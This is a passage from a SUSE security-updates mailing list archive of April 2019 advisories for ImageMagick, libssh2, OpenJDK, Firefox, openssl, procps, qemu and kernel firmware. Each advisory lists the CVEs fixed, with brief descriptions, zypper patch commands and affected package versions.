Fixed a heap-based buffer over-read in PushShortPixel() (bsc#1106989). - CVE-2018-16412: Fixed a heap-based buffer over-read in ParseImageResourceBlocks() (bsc#1106996). - CVE-2018-16644: Fixed a regression in dcm coder (bsc#1107609). - CVE-2019-11007: Fixed a heap-based buffer overflow in ReadMNGImage() (bsc#1132060). - CVE-2019-11008: Fixed a heap-based buffer overflow in WriteXWDImage() (bsc#1132054). - CVE-2019-11009: Fixed a heap-based buffer over-read in ReadXWDImage() (bsc#1132053). - Added extra -config- packages with Postscript/EPS/PDF readers still enabled. Removing the PS decoders is used to harden ImageMagick against security issues within ghostscript. Enabling them might impact security. (bsc#1122033) These are two packages that can be selected: - ImageMagick-config-6-SUSE: This has the PS decoders disabled. - ImageMagick-config-6-upstream: This has the PS decoders enabled. Depending on your local needs install either one of them. The default is the -SUSE configuration. Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1033=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): ImageMagick-config-6-SUSE-6.8.8.1-71.108.1 ImageMagick-config-6-upstream-6.8.8.1-71.108.1 ImageMagick-debuginfo-6.8.8.1-71.108.1 ImageMagick-debugsource-6.8.8.1-71.108.1 libMagickCore-6_Q16-1-6.8.8.1-71.108.1 libMagickCore-6_Q16-1-debuginfo-6.8.8.1-71.108.1 libMagickWand-6_Q16-1-6.8.8.1-71.108.1 libMagickWand-6_Q16-1-debuginfo-6.8.8.1-71.108.1 References: https://www.suse.com/security/cve/CVE-2018-16412.html https://www.suse.com/security/cve/CVE-2018-16413.html https://www.suse.com/security/cve/CVE-2018-16644.html https://www.suse.com/security/cve/CVE-2018-20467.html https://www.suse.com/security/cve/CVE-2019-10650.html https://www.suse.com/security/cve/CVE-2019-11007.html https://www.suse.com/security/cve/CVE-2019-11008.html https://www.suse.com/security/cve/CVE-2019-11009.html https://www.suse.com/security/cve/CVE-2019-7175.html https://www.suse.com/security/cve/CVE-2019-7395.html https://www.suse.com/security/cve/CVE-2019-7397.html https://www.suse.com/security/cve/CVE-2019-7398.html https://www.suse.com/security/cve/CVE-2019-9956.html https://bugzilla.suse.com/1106989 https://bugzilla.suse.com/1106996 https://bugzilla.suse.com/1107609 https://bugzilla.suse.com/1120381 https://bugzilla.suse.com/1122033 https://bugzilla.suse.com/1124365 https://bugzilla.suse.com/1124366 https://bugzilla.suse.com/1124368 https://bugzilla.suse.com/1128649 https://bugzilla.suse.com/1130330 https://bugzilla.suse.com/1131317 https://bugzilla.suse.com/1132053 https://bugzilla.suse.com/1132054 https://bugzilla.suse.com/1132060 From sle-security-updates at lists.suse.com Sat Apr 27 07:09:10 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Sat, 27 Apr 2019 15:09:10 +0200 (CEST) Subject: SUSE-SU-2019:14032-1: important: Security update for libssh2_org Message-ID: <20190427130910.246B3F3D3@maintenance.suse.de> SUSE Security Update: Security update for libssh2_org ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:14032-1 Rating: important References: #1130103 #1133528 Cross-References: CVE-2019-3859 Affected Products: SUSE Linux Enterprise Point of Sale 11-SP3 SUSE Linux Enterprise Debuginfo 11-SP3 ______________________________________________________________________________ An update that solves one vulnerability and has one errata is now available. Description: This update for libssh2_org fixes the following issues: - Incorrect upstream fix for CVE-2019-3859 broke public key authentication [bsc#1133528, bsc#1130103] Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Point of Sale 11-SP3: zypper in -t patch sleposp3-libssh2_org-14032=1 - SUSE Linux Enterprise Debuginfo 11-SP3: zypper in -t patch dbgsp3-libssh2_org-14032=1 Package List: - SUSE Linux Enterprise Point of Sale 11-SP3 (i586): libssh2-1-1.2.9-4.2.12.8.1 - SUSE Linux Enterprise Debuginfo 11-SP3 (i586 s390x x86_64): libssh2_org-debuginfo-1.2.9-4.2.12.8.1 libssh2_org-debugsource-1.2.9-4.2.12.8.1 References: https://www.suse.com/security/cve/CVE-2019-3859.html https://bugzilla.suse.com/1130103 https://bugzilla.suse.com/1133528 From sle-security-updates at lists.suse.com Sat Apr 27 07:09:59 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Sat, 27 Apr 2019 15:09:59 +0200 (CEST) Subject: SUSE-SU-2019:1060-1: important: Security update for libssh2_org Message-ID: <20190427130959.77483F3D3@maintenance.suse.de> SUSE Security Update: Security update for libssh2_org ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:1060-1 Rating: important References: #1130103 #1133528 Cross-References: CVE-2019-3859 Affected Products: SUSE OpenStack Cloud 7 SUSE Linux Enterprise Software Development Kit 12-SP4 SUSE Linux Enterprise Software Development Kit 12-SP3 SUSE Linux Enterprise Server for SAP 12-SP2 SUSE Linux Enterprise Server for SAP 12-SP1 SUSE Linux Enterprise Server 12-SP4 SUSE Linux Enterprise Server 12-SP3 SUSE Linux Enterprise Server 12-SP2-LTSS SUSE Linux Enterprise Server 12-SP2-BCL SUSE Linux Enterprise Server 12-SP1-LTSS SUSE Linux Enterprise Server 12-LTSS SUSE Linux Enterprise Desktop 12-SP4 SUSE Linux Enterprise Desktop 12-SP3 SUSE Enterprise Storage 4 SUSE CaaS Platform ALL SUSE CaaS Platform 3.0 OpenStack Cloud Magnum Orchestration 7 ______________________________________________________________________________ An update that solves one vulnerability and has one errata is now available. Description: This update for libssh2_org fixes the following issues: - Incorrect upstream fix for CVE-2019-3859 broke public key authentication [bsc#1133528, bsc#1130103] Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE OpenStack Cloud 7: zypper in -t patch SUSE-OpenStack-Cloud-7-2019-1060=1 - SUSE Linux Enterprise Software Development Kit 12-SP4: zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-1060=1 - SUSE Linux Enterprise Software Development Kit 12-SP3: zypper in -t patch SUSE-SLE-SDK-12-SP3-2019-1060=1 - SUSE Linux Enterprise Server for SAP 12-SP2: zypper in -t patch SUSE-SLE-SAP-12-SP2-2019-1060=1 - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1060=1 - SUSE Linux Enterprise Server 12-SP4: zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-1060=1 - SUSE Linux Enterprise Server 12-SP3: zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-1060=1 - SUSE Linux Enterprise Server 12-SP2-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP2-2019-1060=1 - SUSE Linux Enterprise Server 12-SP2-BCL: zypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2019-1060=1 - SUSE Linux Enterprise Server 12-SP1-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP1-2019-1060=1 - SUSE Linux Enterprise Server 12-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-2019-1060=1 - SUSE Linux Enterprise Desktop 12-SP4: zypper in -t patch SUSE-SLE-DESKTOP-12-SP4-2019-1060=1 - SUSE Linux Enterprise Desktop 12-SP3: zypper in -t patch SUSE-SLE-DESKTOP-12-SP3-2019-1060=1 - SUSE Enterprise Storage 4: zypper in -t patch SUSE-Storage-4-2019-1060=1 - SUSE CaaS Platform ALL: To install this update, use the SUSE CaaS Platform Velum dashboard. It will inform you if it detects new updates and let you then trigger updating of the complete cluster in a controlled way. - SUSE CaaS Platform 3.0: To install this update, use the SUSE CaaS Platform Velum dashboard. It will inform you if it detects new updates and let you then trigger updating of the complete cluster in a controlled way. - OpenStack Cloud Magnum Orchestration 7: zypper in -t patch SUSE-OpenStack-Cloud-Magnum-Orchestration-7-2019-1060=1 Package List: - SUSE OpenStack Cloud 7 (s390x x86_64): libssh2-1-1.4.3-20.6.1 libssh2-1-32bit-1.4.3-20.6.1 libssh2-1-debuginfo-1.4.3-20.6.1 libssh2-1-debuginfo-32bit-1.4.3-20.6.1 libssh2_org-debugsource-1.4.3-20.6.1 - SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 ppc64le s390x x86_64): libssh2-devel-1.4.3-20.6.1 libssh2_org-debugsource-1.4.3-20.6.1 - SUSE Linux Enterprise Software Development Kit 12-SP3 (aarch64 ppc64le s390x x86_64): libssh2-devel-1.4.3-20.6.1 libssh2_org-debugsource-1.4.3-20.6.1 - SUSE Linux Enterprise Server for SAP 12-SP2 (ppc64le x86_64): libssh2-1-1.4.3-20.6.1 libssh2-1-debuginfo-1.4.3-20.6.1 libssh2_org-debugsource-1.4.3-20.6.1 - SUSE Linux Enterprise Server for SAP 12-SP2 (x86_64): libssh2-1-32bit-1.4.3-20.6.1 libssh2-1-debuginfo-32bit-1.4.3-20.6.1 - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): libssh2-1-1.4.3-20.6.1 libssh2-1-32bit-1.4.3-20.6.1 libssh2-1-debuginfo-1.4.3-20.6.1 libssh2-1-debuginfo-32bit-1.4.3-20.6.1 libssh2_org-debugsource-1.4.3-20.6.1 - SUSE Linux Enterprise Server 12-SP4 (aarch64 ppc64le s390x x86_64): libssh2-1-1.4.3-20.6.1 libssh2-1-debuginfo-1.4.3-20.6.1 libssh2_org-debugsource-1.4.3-20.6.1 - SUSE Linux Enterprise Server 12-SP4 (s390x x86_64): libssh2-1-32bit-1.4.3-20.6.1 libssh2-1-debuginfo-32bit-1.4.3-20.6.1 - SUSE Linux Enterprise Server 12-SP3 (aarch64 ppc64le s390x x86_64): libssh2-1-1.4.3-20.6.1 libssh2-1-debuginfo-1.4.3-20.6.1 libssh2_org-debugsource-1.4.3-20.6.1 - SUSE Linux Enterprise Server 12-SP3 (s390x x86_64): libssh2-1-32bit-1.4.3-20.6.1 libssh2-1-debuginfo-32bit-1.4.3-20.6.1 - SUSE Linux Enterprise Server 12-SP2-LTSS (ppc64le s390x x86_64): libssh2-1-1.4.3-20.6.1 libssh2-1-debuginfo-1.4.3-20.6.1 libssh2_org-debugsource-1.4.3-20.6.1 - SUSE Linux Enterprise Server 12-SP2-LTSS (s390x x86_64): libssh2-1-32bit-1.4.3-20.6.1 libssh2-1-debuginfo-32bit-1.4.3-20.6.1 - SUSE Linux Enterprise Server 12-SP2-BCL (x86_64): libssh2-1-1.4.3-20.6.1 libssh2-1-32bit-1.4.3-20.6.1 libssh2-1-debuginfo-1.4.3-20.6.1 libssh2-1-debuginfo-32bit-1.4.3-20.6.1 libssh2_org-debugsource-1.4.3-20.6.1 - SUSE Linux Enterprise Server 12-SP1-LTSS (ppc64le s390x x86_64): libssh2-1-1.4.3-20.6.1 libssh2-1-debuginfo-1.4.3-20.6.1 libssh2_org-debugsource-1.4.3-20.6.1 - SUSE Linux Enterprise Server 12-SP1-LTSS (s390x x86_64): libssh2-1-32bit-1.4.3-20.6.1 libssh2-1-debuginfo-32bit-1.4.3-20.6.1 - SUSE Linux Enterprise Server 12-LTSS (ppc64le s390x x86_64): libssh2-1-1.4.3-20.6.1 libssh2-1-debuginfo-1.4.3-20.6.1 libssh2_org-debugsource-1.4.3-20.6.1 - SUSE Linux Enterprise Server 12-LTSS (s390x x86_64): libssh2-1-32bit-1.4.3-20.6.1 libssh2-1-debuginfo-32bit-1.4.3-20.6.1 - SUSE Linux Enterprise Desktop 12-SP4 (x86_64): libssh2-1-1.4.3-20.6.1 libssh2-1-32bit-1.4.3-20.6.1 libssh2-1-debuginfo-1.4.3-20.6.1 libssh2-1-debuginfo-32bit-1.4.3-20.6.1 libssh2_org-debugsource-1.4.3-20.6.1 - SUSE Linux Enterprise Desktop 12-SP3 (x86_64): libssh2-1-1.4.3-20.6.1 libssh2-1-32bit-1.4.3-20.6.1 libssh2-1-debuginfo-1.4.3-20.6.1 libssh2-1-debuginfo-32bit-1.4.3-20.6.1 libssh2_org-debugsource-1.4.3-20.6.1 - SUSE Enterprise Storage 4 (x86_64): libssh2-1-1.4.3-20.6.1 libssh2-1-32bit-1.4.3-20.6.1 libssh2-1-debuginfo-1.4.3-20.6.1 libssh2-1-debuginfo-32bit-1.4.3-20.6.1 libssh2_org-debugsource-1.4.3-20.6.1 - SUSE CaaS Platform ALL (x86_64): libssh2-1-1.4.3-20.6.1 libssh2-1-debuginfo-1.4.3-20.6.1 libssh2_org-debugsource-1.4.3-20.6.1 - SUSE CaaS Platform 3.0 (x86_64): libssh2-1-1.4.3-20.6.1 libssh2-1-debuginfo-1.4.3-20.6.1 libssh2_org-debugsource-1.4.3-20.6.1 - OpenStack Cloud Magnum Orchestration 7 (x86_64): libssh2-1-1.4.3-20.6.1 libssh2-1-debuginfo-1.4.3-20.6.1 libssh2_org-debugsource-1.4.3-20.6.1 References: https://www.suse.com/security/cve/CVE-2019-3859.html https://bugzilla.suse.com/1130103 https://bugzilla.suse.com/1133528 From sle-security-updates at lists.suse.com Sat Apr 27 07:10:50 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Sat, 27 Apr 2019 15:10:50 +0200 (CEST) Subject: SUSE-SU-2019:1059-1: important: Security update for libssh2_org Message-ID: <20190427131050.3EE72F3D3@maintenance.suse.de> SUSE Security Update: Security update for libssh2_org ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:1059-1 Rating: important References: #1130103 #1133528 Cross-References: CVE-2019-3859 Affected Products: SUSE Linux Enterprise Module for Basesystem 15 ______________________________________________________________________________ An update that solves one vulnerability and has one errata is now available. Description: This update for libssh2_org fixes the following issues: - Incorrect upstream fix for CVE-2019-3859 broke public key authentication [bsc#1133528, bsc#1130103] Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Module for Basesystem 15: zypper in -t patch SUSE-SLE-Module-Basesystem-15-2019-1059=1 Package List: - SUSE Linux Enterprise Module for Basesystem 15 (aarch64 ppc64le s390x x86_64): libssh2-1-1.8.0-4.6.1 libssh2-1-debuginfo-1.8.0-4.6.1 libssh2-devel-1.8.0-4.6.1 libssh2_org-debugsource-1.8.0-4.6.1 References: https://www.suse.com/security/cve/CVE-2019-3859.html https://bugzilla.suse.com/1130103 https://bugzilla.suse.com/1133528 From sle-security-updates at lists.suse.com Sat Apr 27 07:11:34 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Sat, 27 Apr 2019 15:11:34 +0200 (CEST) Subject: SUSE-SU-2019:14031-1: important: Security update for libssh2_org Message-ID: <20190427131134.58C86F3D3@maintenance.suse.de> SUSE Security Update: Security update for libssh2_org ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:14031-1 Rating: important References: #1091236 #1130103 #1133528 Cross-References: CVE-2019-3859 Affected Products: SUSE Linux Enterprise Server 11-SP4-LTSS SUSE Linux Enterprise Debuginfo 11-SP4 ______________________________________________________________________________ An update that solves one vulnerability and has two fixes is now available. Description: This update for libssh2_org fixes the following issues: - Incorrect upstream fix for CVE-2019-3859 broke public key authentication [bsc#1133528, bsc#1130103] - Store but don't use keys of unsupported types in the known_hosts file [bsc#1091236] Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server 11-SP4-LTSS: zypper in -t patch slessp4-libssh2_org-14031=1 - SUSE Linux Enterprise Debuginfo 11-SP4: zypper in -t patch dbgsp4-libssh2_org-14031=1 Package List: - SUSE Linux Enterprise Server 11-SP4-LTSS (i586 ppc64 s390x x86_64): libssh2-1-1.4.3-17.6.1 - SUSE Linux Enterprise Debuginfo 11-SP4 (i586 ppc64 s390x x86_64): libssh2_org-debuginfo-1.4.3-17.6.1 libssh2_org-debugsource-1.4.3-17.6.1 References: https://www.suse.com/security/cve/CVE-2019-3859.html https://bugzilla.suse.com/1091236 https://bugzilla.suse.com/1130103 https://bugzilla.suse.com/1133528 From sle-security-updates at lists.suse.com Sat Apr 27 16:09:00 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Sun, 28 Apr 2019 00:09:00 +0200 (CEST) Subject: SUSE-SU-2019:0057-2: important: Security update for java-1_8_0-openjdk Message-ID: <20190427220900.F36ADF3D3@maintenance.suse.de> SUSE Security Update: Security update for java-1_8_0-openjdk ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0057-2 Rating: important References: #1112142 #1112143 #1112144 #1112146 #1112147 #1112148 #1112152 #1112153 Cross-References: CVE-2018-13785 CVE-2018-16435 CVE-2018-3136 CVE-2018-3139 CVE-2018-3149 CVE-2018-3169 CVE-2018-3180 CVE-2018-3183 CVE-2018-3214 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 ______________________________________________________________________________ An update that fixes 9 vulnerabilities is now available. Description: This update for java-1_8_0-openjdk to version 8u191 fixes the following issues: Security issues fixed: - CVE-2018-3136: Manifest better support (bsc#1112142) - CVE-2018-3139: Better HTTP Redirection (bsc#1112143) - CVE-2018-3149: Enhance JNDI lookups (bsc#1112144) - CVE-2018-3169: Improve field accesses (bsc#1112146) - CVE-2018-3180: Improve TLS connections stability (bsc#1112147) - CVE-2018-3214: Better RIFF reading support (bsc#1112152) - CVE-2018-13785: Upgrade JDK 8u to libpng 1.6.35 (bsc#1112153) - CVE-2018-3183: Improve script engine support (bsc#1112148) - CVE-2018-16435: heap-based buffer overflow in SetData function in cmsIT8LoadFromFile Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-57=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): java-1_8_0-openjdk-1.8.0.191-27.29.1 java-1_8_0-openjdk-debuginfo-1.8.0.191-27.29.1 java-1_8_0-openjdk-debugsource-1.8.0.191-27.29.1 java-1_8_0-openjdk-demo-1.8.0.191-27.29.1 java-1_8_0-openjdk-demo-debuginfo-1.8.0.191-27.29.1 java-1_8_0-openjdk-devel-1.8.0.191-27.29.1 java-1_8_0-openjdk-headless-1.8.0.191-27.29.1 java-1_8_0-openjdk-headless-debuginfo-1.8.0.191-27.29.1 References: https://www.suse.com/security/cve/CVE-2018-13785.html https://www.suse.com/security/cve/CVE-2018-16435.html https://www.suse.com/security/cve/CVE-2018-3136.html https://www.suse.com/security/cve/CVE-2018-3139.html https://www.suse.com/security/cve/CVE-2018-3149.html https://www.suse.com/security/cve/CVE-2018-3169.html https://www.suse.com/security/cve/CVE-2018-3180.html https://www.suse.com/security/cve/CVE-2018-3183.html https://www.suse.com/security/cve/CVE-2018-3214.html https://bugzilla.suse.com/1112142 https://bugzilla.suse.com/1112143 https://bugzilla.suse.com/1112144 https://bugzilla.suse.com/1112146 https://bugzilla.suse.com/1112147 https://bugzilla.suse.com/1112148 https://bugzilla.suse.com/1112152 https://bugzilla.suse.com/1112153 From sle-security-updates at lists.suse.com Sat Apr 27 16:10:55 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Sun, 28 Apr 2019 00:10:55 +0200 (CEST) Subject: SUSE-SU-2019:0427-2: important: Security update for kernel-firmware Message-ID: <20190427221055.69FA6F3D3@maintenance.suse.de> SUSE Security Update: Security update for kernel-firmware ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0427-2 Rating: important References: #1104301 Cross-References: CVE-2018-5383 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 ______________________________________________________________________________ An update that fixes one vulnerability is now available. Description: This update for kernel-firmware fixes the following issues: Security issue fixed: - CVE-2018-5383: Fixed an implementation issue in Bluetooth where the eliptic curve parameters were not sufficiently validated during Diffie-Hellman key exchange (bsc#1104301). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-427=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (noarch): kernel-firmware-20160516git-10.16.1 ucode-amd-20160516git-10.16.1 References: https://www.suse.com/security/cve/CVE-2018-5383.html https://bugzilla.suse.com/1104301 From sle-security-updates at lists.suse.com Sat Apr 27 16:11:33 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Sun, 28 Apr 2019 00:11:33 +0200 (CEST) Subject: SUSE-SU-2018:3749-3: important: Security update for MozillaFirefox Message-ID: <20190427221133.BD9EAF3D3@maintenance.suse.de> SUSE Security Update: Security update for MozillaFirefox ______________________________________________________________________________ Announcement ID: SUSE-SU-2018:3749-3 Rating: important References: #1112852 Cross-References: CVE-2018-12389 CVE-2018-12390 CVE-2018-12392 CVE-2018-12393 CVE-2018-12395 CVE-2018-12396 CVE-2018-12397 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 ______________________________________________________________________________ An update that fixes 7 vulnerabilities is now available. Description: This update for MozillaFirefox fixes the following issues: Security issues fixed: - Update to Mozilla Firefox 60.3.0esr: MFSA 2018-27 (bsc#1112852) - CVE-2018-12392: Crash with nested event loops. - CVE-2018-12393: Integer overflow during Unicode conversion while loading JavaScript. - CVE-2018-12395: WebExtension bypass of domain restrictions through header rewriting. - CVE-2018-12396: WebExtension content scripts can execute in disallowed contexts. - CVE-2018-12397: WebExtension local file access vulnerability. - CVE-2018-12389: Memory safety bugs fixed in Firefox ESR 60.3. - CVE-2018-12390: Memory safety bugs fixed in Firefox 63 and Firefox ESR 60.3. Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1079=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): MozillaFirefox-60.3.0-109.50.2 MozillaFirefox-debuginfo-60.3.0-109.50.2 MozillaFirefox-debugsource-60.3.0-109.50.2 MozillaFirefox-devel-60.3.0-109.50.2 MozillaFirefox-translations-common-60.3.0-109.50.2 References: https://www.suse.com/security/cve/CVE-2018-12389.html https://www.suse.com/security/cve/CVE-2018-12390.html https://www.suse.com/security/cve/CVE-2018-12392.html https://www.suse.com/security/cve/CVE-2018-12393.html https://www.suse.com/security/cve/CVE-2018-12395.html https://www.suse.com/security/cve/CVE-2018-12396.html https://www.suse.com/security/cve/CVE-2018-12397.html https://bugzilla.suse.com/1112852 From sle-security-updates at lists.suse.com Sat Apr 27 16:12:16 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Sun, 28 Apr 2019 00:12:16 +0200 (CEST) Subject: SUSE-SU-2018:3864-2: moderate: Security update for openssl Message-ID: <20190427221216.312CFF3D3@maintenance.suse.de> SUSE Security Update: Security update for openssl ______________________________________________________________________________ Announcement ID: SUSE-SU-2018:3864-2 Rating: moderate References: #1101470 #1104789 #1106197 #1110018 #1113534 #1113652 Cross-References: CVE-2016-8610 CVE-2018-0734 CVE-2018-0737 CVE-2018-5407 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 ______________________________________________________________________________ An update that solves four vulnerabilities and has two fixes is now available. Description: This update for openssl fixes the following issues: Security issues fixed: - CVE-2018-0734: Fixed timing vulnerability in DSA signature generation (bsc#1113652). - CVE-2018-5407: Fixed elliptic curve scalar multiplication timing attack defenses (bsc#1113534). - CVE-2018-0737: Corrected the current error detection of the current fix (bsc#1106197). - CVE-2016-8610: Adjusted current fix and add missing error string (bsc#1110018). - Add missing timing side channel patch for DSA signature generation (bsc#1113742). - Fixed the "One and Done" side-channel attack on RSA (bsc#1104789). Non-security issues fixed: - Added openssl(cli) so that the packages that required the openssl binary can require this instead of the new openssl meta package (bsc#1101470). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1063=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): libopenssl1_0_0-1.0.1i-54.20.1 libopenssl1_0_0-32bit-1.0.1i-54.20.1 libopenssl1_0_0-debuginfo-1.0.1i-54.20.1 libopenssl1_0_0-debuginfo-32bit-1.0.1i-54.20.1 libopenssl1_0_0-hmac-1.0.1i-54.20.1 libopenssl1_0_0-hmac-32bit-1.0.1i-54.20.1 openssl-1.0.1i-54.20.1 openssl-debuginfo-1.0.1i-54.20.1 openssl-debugsource-1.0.1i-54.20.1 - SUSE Linux Enterprise Server for SAP 12-SP1 (noarch): openssl-doc-1.0.1i-54.20.1 References: https://www.suse.com/security/cve/CVE-2016-8610.html https://www.suse.com/security/cve/CVE-2018-0734.html https://www.suse.com/security/cve/CVE-2018-0737.html https://www.suse.com/security/cve/CVE-2018-5407.html https://bugzilla.suse.com/1101470 https://bugzilla.suse.com/1104789 https://bugzilla.suse.com/1106197 https://bugzilla.suse.com/1110018 https://bugzilla.suse.com/1113534 https://bugzilla.suse.com/1113652 From sle-security-updates at lists.suse.com Sat Apr 27 16:13:55 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Sun, 28 Apr 2019 00:13:55 +0200 (CEST) Subject: SUSE-SU-2019:0450-2: important: Security update for procps Message-ID: <20190427221355.98C44F3D3@maintenance.suse.de> SUSE Security Update: Security update for procps ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0450-2 Rating: important References: #1092100 #1121753 Cross-References: CVE-2018-1122 CVE-2018-1123 CVE-2018-1124 CVE-2018-1125 CVE-2018-1126 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 ______________________________________________________________________________ An update that fixes 5 vulnerabilities is now available. Description: This update for procps fixes the following security issues: - CVE-2018-1122: Prevent local privilege escalation in top. If a user ran top with HOME unset in an attacker-controlled directory, the attacker could have achieved privilege escalation by exploiting one of several vulnerabilities in the config_file() function (bsc#1092100). - CVE-2018-1123: Prevent denial of service in ps via mmap buffer overflow. Inbuilt protection in ps maped a guard page at the end of the overflowed buffer, ensuring that the impact of this flaw is limited to a crash (temporary denial of service) (bsc#1092100). - CVE-2018-1124: Prevent multiple integer overflows leading to a heap corruption in file2strvec function. This allowed a privilege escalation for a local attacker who can create entries in procfs by starting processes, which could result in crashes or arbitrary code execution in proc utilities run by other users (bsc#1092100). - CVE-2018-1125: Prevent stack buffer overflow in pgrep. This vulnerability was mitigated by FORTIFY limiting the impact to a crash (bsc#1092100). - CVE-2018-1126: Ensure correct integer size in proc/alloc.* to prevent truncation/integer overflow issues (bsc#1092100). (These issues were previously released for SUSE Linux Enterprise 12 SP3 and SP4.) Also the following non-security issue was fixed: - Fix CPU summary showing old data. (bsc#1121753) Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-450=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): libprocps3-3.3.9-11.18.1 libprocps3-debuginfo-3.3.9-11.18.1 procps-3.3.9-11.18.1 procps-debuginfo-3.3.9-11.18.1 procps-debugsource-3.3.9-11.18.1 References: https://www.suse.com/security/cve/CVE-2018-1122.html https://www.suse.com/security/cve/CVE-2018-1123.html https://www.suse.com/security/cve/CVE-2018-1124.html https://www.suse.com/security/cve/CVE-2018-1125.html https://www.suse.com/security/cve/CVE-2018-1126.html https://bugzilla.suse.com/1092100 https://bugzilla.suse.com/1121753 From sle-security-updates at lists.suse.com Sat Apr 27 16:15:03 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Sun, 28 Apr 2019 00:15:03 +0200 (CEST) Subject: SUSE-SU-2019:0471-2: important: Security update for qemu Message-ID: <20190427221503.10F63F3D3@maintenance.suse.de> SUSE Security Update: Security update for qemu ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0471-2 Rating: important References: #1116717 #1117275 #1119493 #1123156 Cross-References: CVE-2018-16872 CVE-2018-19364 CVE-2018-19489 CVE-2019-6778 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 ______________________________________________________________________________ An update that fixes four vulnerabilities is now available. Description: This update for qemu fixes the following issues: Security issue fixed: - CVE-2019-6778: Fixed a heap buffer overflow issue in the SLiRP networking implementation (bsc#1123156). - CVE-2018-16872: Fixed a host security vulnerability related to handling symlinks in usb-mtp (bsc#1119493). - CVE-2018-19489: Fixed a denial of service vulnerability in virtfs (bsc#1117275). - CVE-2018-19364: Fixed a use-after-free if the virtfs interface resulting in a denial of service (bsc#1116717). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-471=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): qemu-2.3.1-33.20.1 qemu-block-curl-2.3.1-33.20.1 qemu-block-curl-debuginfo-2.3.1-33.20.1 qemu-block-rbd-2.3.1-33.20.1 qemu-block-rbd-debuginfo-2.3.1-33.20.1 qemu-debugsource-2.3.1-33.20.1 qemu-guest-agent-2.3.1-33.20.1 qemu-guest-agent-debuginfo-2.3.1-33.20.1 qemu-kvm-2.3.1-33.20.1 qemu-lang-2.3.1-33.20.1 qemu-tools-2.3.1-33.20.1 qemu-tools-debuginfo-2.3.1-33.20.1 